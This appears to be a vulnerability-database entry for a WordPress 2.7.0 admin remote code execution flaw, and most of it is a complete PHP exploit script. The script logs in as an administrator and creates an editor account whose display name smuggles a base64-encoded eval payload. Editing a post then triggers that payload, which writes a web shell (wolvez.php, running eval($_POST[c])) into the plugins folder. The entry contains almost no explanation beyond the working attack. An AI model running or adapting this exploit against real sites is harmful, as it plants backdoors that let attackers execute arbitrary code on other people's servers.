Wordpress 2.7.0 admin remote code execution vulnerability

基本字段

漏洞编号：: SSV-4656

披露/发现时间：: 未知

提交时间：: 2009-01-12

漏洞等级：

漏洞类别：: 代码执行

影响组件：: WordPress
(2.7.0)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.55KB

#!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Wordpress 2.7.0 remote code execution exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org site: http://www.80vul.com dork: "powered by WordPress" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 6) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user pass post host: target server (ip/hostname) path: path to wordpress user: admin login username pass: admin login password post: the available post id Example: php '.$argv[0].' localhost /wp/ admin 123456 1 +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4]; $post = $argv[5]; $shellcode = '\\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));\\\''; //$shellcode = '\\\';}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));//'; $shell = 'http://'.$host.$path.'wp-content/plugins/wolvez.php'; /** * wolvez.php has this code: * <?eval($_POST[c])?> */ $url = $path.'wp-login.php'; $cmd = 'log='.urlencode($user).'&pwd='.urlencode($pass); $resp = send(); preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $admin_cookie); if (!$admin_cookie) exit("Exploit Failed!\n"); $url = $path.'wp-admin/user-new.php#add-new-user'; $cmd = ''; $resp = send($admin_cookie[1]); preg_match('/name="_wpnonce"\svalue="([a-z0-9]{10})"/', $resp, $_wpnonce); if (!$_wpnonce) exit("Exploit Failed!\n"); $cmd = '_wpnonce='.$_wpnonce[1].'&action=adduser&user_login=ryat&email=ryat%40ryat.com&pass1=123456&pass2=123456&role=editor&display_name='.$shellcode; $resp = send($admin_cookie[1]); if (strpos($resp, 'users.php?usersearch=ryat&update=add#user') === false) exit("Exploit Failed!\n"); $url = $path.'wp-login.php'; $cmd = 'log=ryat&pwd=123456'; $resp = send(); preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $editor_cookie); if (!$editor_cookie) exit("Exploit Failed!\n"); $url = $path.'wp-admin/post.php?action=edit&post='.$post; $cmd = ''; send($editor_cookie[1]); send($admin_cookie[1]); if (strpos(file_get_contents($shell), 'puret_t') !== false) exit("Expoilt Success!\nView Your shell:\t$shell\n"); else exit("Exploit Failed!\n"); function send($cookie = '') { global $host, $path, $url, $cmd; $data = "POST $url HTTP/1.1\r\n"; $data .= "Accept: */*\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n"; $data .= "Connection: Close\r\n"; $data .= "Cookie: $cookie\r\n\r\n"; $data .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?>